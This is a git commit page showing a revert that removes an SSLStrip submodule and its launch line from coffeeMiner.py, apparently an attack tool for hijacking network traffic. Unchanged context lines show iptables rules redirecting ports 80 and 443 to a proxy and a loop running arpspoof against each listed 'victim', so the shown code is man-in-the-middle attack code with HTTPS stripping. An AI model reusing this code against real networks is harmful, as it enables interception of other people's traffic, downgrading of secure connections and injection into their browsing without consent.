Browse Source

Revert "Added SSLStrip"

This reverts commit 3024e65fa3.
pull/5/head
Chase Taylor 7 years ago
parent
commit
f3b3299b51
3 changed files with 0 additions and 6 deletions
  1. +0
    -3
      .gitmodules
  2. +0
    -2
      coffeeMiner.py
  3. +0
    -1
      sslstrip

+ 0
- 3
.gitmodules

@ -1,3 +0,0 @@
[submodule "sslstrip"]
path = sslstrip
url = https://github.com/moxie0/sslstrip.git

+ 0
- 2
coffeeMiner.py

@ -34,8 +34,6 @@ os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")
# run SSLStrip on port 8080
os.system("python /sslstrip/sslstrip.py -l 8080")
# run the arpspoof for each victim, each one in a new console
for victim in victims:

+ 0
- 1
sslstrip

@ -1 +0,0 @@
Subproject commit 8dac3873890b25819a1c1191cbd5de96d3dba219

Loading…
Cancel
Save